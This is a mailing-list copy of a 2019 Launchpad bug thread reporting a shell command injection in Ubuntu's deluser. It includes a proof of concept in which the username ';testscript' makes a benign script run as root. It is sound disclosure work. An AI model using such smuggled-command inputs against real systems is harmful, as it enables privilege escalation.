[Bug 1838489] Re: adduser & deluser shell command injection

Haoxi Tan 1838489 at bugs.launchpad.net
Tue Sep 17 13:32:38 UTC 2019 

Hi,

I have reported this bug to Debian:

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577

Warm regards,
Haoxi

On Tue, 17 Sep 2019 at 6:26 pm, Marc Deslauriers <
marc.deslauriers at canonical.com> wrote:

> Hi! Have you had a chance to report this issue to Debian?
>
> ** Changed in: adduser (Ubuntu)
>        Status: New => Incomplete
>
> ** Information type changed from Private Security to Public Security
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1838489
>
> Title:
>   adduser & deluser shell command injection
>
> Status in adduser package in Ubuntu:
>   Incomplete
>
> Bug description:
>   deluser program is vulnerable to a command injection vulnerability
>   when a user is added via adduser with special characters (such as
>   ';'). It is only possible when the user exists on the system (adduser
>   does not prevent usernames with ';' to be added.)
>
>   This can be a security risk when user accounts on the system can be
>   created from arbitrary input, and there are exploitable programs in
>   PATH to make privilege escalation possible.
>
>   -------------- Proof of concept ----------------
>
>   # ll /test-file
>   ls: cannot access '/test-file': No such file or directory
>
>   # cat /usr/bin/testscript
>   #!/bin/bash
>   touch /test-file
>
>   # deluser
>   Enter a user name to remove: ;testscript
>   no crontab for root
>   crontab: usage error: no arguments permitted after this option
>   usage:  crontab [-u user] file
>           crontab [ -u user ] [ -i ] { -e | -l | -r }
>                   (default operation is replace, per 1003.2)
>           -e      (edit user's crontab)
>           -l      (list user's crontab)
>           -r      (delete user's crontab)
>           -i      (prompt before deleting user's crontab)
>   /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code
> 1. Exiting.
>   (failed reverse-i-search)`': deluser^C
>    # ll /test-file
>   -rw------- 1 root root 0 Jul 31 10:25 /test-file
>
>
>   -------- system description --------
>
>   Description:  Ubuntu 18.04.2 LTS
>   Release:      18.04
>
>   # apt-cache policy adduser
>   adduser:
>     Installed: 3.116ubuntu1
>     Candidate: 3.116ubuntu1
>     Version table:
>    *** 3.116ubuntu1 500
>           500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
>           100 /var/lib/dpkg/status
>
> To manage notifications about this bug go to:
>
> https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions
>


** Bug watch added: Debian Bug tracker #940577
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to adduser in Ubuntu.
https://bugs.launchpad.net/bugs/1838489

Title:
  adduser & deluser shell command injection

Status in adduser package in Ubuntu:
  Incomplete

Bug description:
  deluser program is vulnerable to a command injection vulnerability
  when a user is added via adduser with special characters (such as
  ';'). It is only possible when the user exists on the system (adduser
  does not prevent usernames with ';' to be added.)

  This can be a security risk when user accounts on the system can be
  created from arbitrary input, and there are exploitable programs in
  PATH to make privilege escalation possible.

  -------------- Proof of concept ----------------

  # ll /test-file
  ls: cannot access '/test-file': No such file or directory

  # cat /usr/bin/testscript
  #!/bin/bash
  touch /test-file

  # deluser
  Enter a user name to remove: ;testscript
  no crontab for root
  crontab: usage error: no arguments permitted after this option
  usage:  crontab [-u user] file
          crontab [ -u user ] [ -i ] { -e | -l | -r }
                  (default operation is replace, per 1003.2)
          -e      (edit user's crontab)
          -l      (list user's crontab)
          -r      (delete user's crontab)
          -i      (prompt before deleting user's crontab)
  /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting.
  (failed reverse-i-search)`': deluser^C
   # ll /test-file
  -rw------- 1 root root 0 Jul 31 10:25 /test-file

  
  -------- system description --------

  Description:	Ubuntu 18.04.2 LTS
  Release:	18.04

  # apt-cache policy adduser
  adduser:
    Installed: 3.116ubuntu1
    Candidate: 3.116ubuntu1
    Version table:
   *** 3.116ubuntu1 500
          500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
          100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions

More information about the foundations-bugs mailing list